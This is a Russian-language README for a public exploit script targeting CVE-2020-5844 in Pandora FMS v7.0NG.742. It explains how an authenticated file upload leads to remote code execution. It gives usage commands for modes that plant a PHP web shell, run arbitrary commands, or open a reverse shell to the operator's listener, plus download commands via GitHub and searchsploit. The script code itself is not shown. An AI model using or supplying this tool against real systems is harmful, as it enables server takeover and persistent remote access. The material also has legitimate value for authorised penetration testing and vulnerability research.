
Эксплойт для CVE-2020-5844 (Pandora FMS v7.0NG.742) - удалённое выполнение кода

Нравится этот репозиторий? Поставьте нам ⭐!
Только для образовательных целей и санкционированных исследований в области безопасности.
@UNICORDev от (@NicPWNs и @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo в Pandora FMS v7.0 NG позволяет аутентифицированным администраторам загружать вредоносные PHP-скрипты и выполнять их с помощью декодирования base64 расположения файла. Уязвимость затрагивает v7.0NG.742_FIX_PERL2020.
Используйте этот эксплойт для удалённого выполнения кода на уязвимых версиях Pandora FMS. Требуется IP-адрес и порт цели. Требуется действительная пара «имя пользователя/пароль» или действительная аутентификация по cookie PHPSESSID. Запустите в режиме по умолчанию, чтобы загрузить базовый PHP-веб-шелл. Запустите в режиме пользовательской команды, чтобы выполнить произвольную команду на цели. Запустите в режиме обратного шелла, чтобы получить обратный шелл от цели на настроенном вами слушателе. Запустите в пользовательском режиме веб-шелла, чтобы изменить имя PHP-файла веб-шелла.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
Скачать exploit-CVE-2020-5844.py с GitHub
Скачать exploit-CVE-2020-5844.py с ExploitDB
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




